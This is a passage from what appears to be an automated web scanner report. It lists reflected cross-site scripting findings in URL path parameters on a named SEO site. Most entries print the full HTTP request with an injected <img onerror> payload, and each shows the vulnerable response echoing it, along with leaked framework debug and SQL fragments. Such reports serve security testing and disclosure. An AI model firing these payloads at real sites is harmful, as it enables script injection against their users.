GET /quotient/2011/04/22/2271/Ne219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271/Ne219d"><img src=a onerror=alert(1)>386ed1751a4" title="SEO Quotient for ">
...[SNIP]...

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fd7'%3b0c772ed9b7b was submitted in the REST URL parameter 5. This input was echoed as 14fd7';0c772ed9b7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/227214fd7'%3b0c772ed9b7b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/227214fd7';0c772ed9b7b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc was submitted in the REST URL parameter 5. This input was echoed as 11e62"><img src=a onerror=alert(1)>ec3b20cb8bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/227211e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/227211e62"><img src=a onerror=alert(1)>ec3b20cb8bc/N" title="SEO Quotient for ">
...[SNIP]...

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e was submitted in the REST URL parameter 5. This input was echoed as 7afe1<img src=a onerror=alert(1)>6a57730655e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22727afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22727afe1<img src=a onerror=alert(1)>6a57730655e and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19a08'%3b280f9175559 was submitted in the REST URL parameter 6. This input was echoed as 19a08';280f9175559 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2272/N19a08'%3b280f9175559 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2272/N19a08';280f9175559';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d was submitted in the REST URL parameter 6. This input was echoed as 1874b<img src=a onerror=alert(1)>838bfb09b7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/N1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:22 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>838bfb09b7d" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2272/N1874b<img src=a onerror=alert(1)>838bfb09b7dddd</a>
...[SNIP]...

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 was submitted in the REST URL parameter 6. This input was echoed as b9011"><img src=a onerror=alert(1)>7829e282ab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/Nb9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:18 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2272/Nb9011"><img src=a onerror=alert(1)>7829e282ab5" title="SEO Quotient for ">
...[SNIP]...

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad3ad'%3b463e9885ca0 was submitted in the REST URL parameter 5. This input was echoed as ad3ad';463e9885ca0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837ad3ad'%3b463e9885ca0/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837ad3ad';463e9885ca0/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31 was submitted in the REST URL parameter 5. This input was echoed as a2f78"><img src=a onerror=alert(1)>bb9cb173e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837a2f78"><img src=a onerror=alert(1)>bb9cb173e31/N" title="SEO Quotient for ">
...[SNIP]...

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d was submitted in the REST URL parameter 5. This input was echoed as e4fbb<img src=a onerror=alert(1)>4613103a22d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2837e4fbb<img src=a onerror=alert(1)>4613103a22d and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc was submitted in the REST URL parameter 6. This input was echoed as 27b60<img src=a onerror=alert(1)>ef64cfd30bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>ef64cfd30bc" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2837/N27b60<img src=a onerror=alert(1)>ef64cfd30bcddd</a>
...[SNIP]...

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 was submitted in the REST URL parameter 6. This input was echoed as 17a92"><img src=a onerror=alert(1)>de0a2e8b0b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:12 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:12 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837/N17a92"><img src=a onerror=alert(1)>de0a2e8b0b4" title="SEO Quotient for ">
...[SNIP]...

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3919e'%3bac9e2d2d60d was submitted in the REST URL parameter 6. This input was echoed as 3919e';ac9e2d2d60d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837/N3919e'%3bac9e2d2d60d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837/N3919e';ac9e2d2d60d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88 was submitted in the REST URL parameter 5. This input was echoed as e2d53<img src=a onerror=alert(1)>004fea5ea88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2838e2d53<img src=a onerror=alert(1)>004fea5ea88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf was submitted in the REST URL parameter 5. This input was echoed as b22fb"><img src=a onerror=alert(1)>a2def4fbbbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838b22fb"><img src=a onerror=alert(1)>a2def4fbbbf/N" title="SEO Quotient for ">
...[SNIP]...

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2955f'%3b8adf3a8c684 was submitted in the REST URL parameter 5. This input was echoed as 2955f';8adf3a8c684 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/28382955f'%3b8adf3a8c684/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
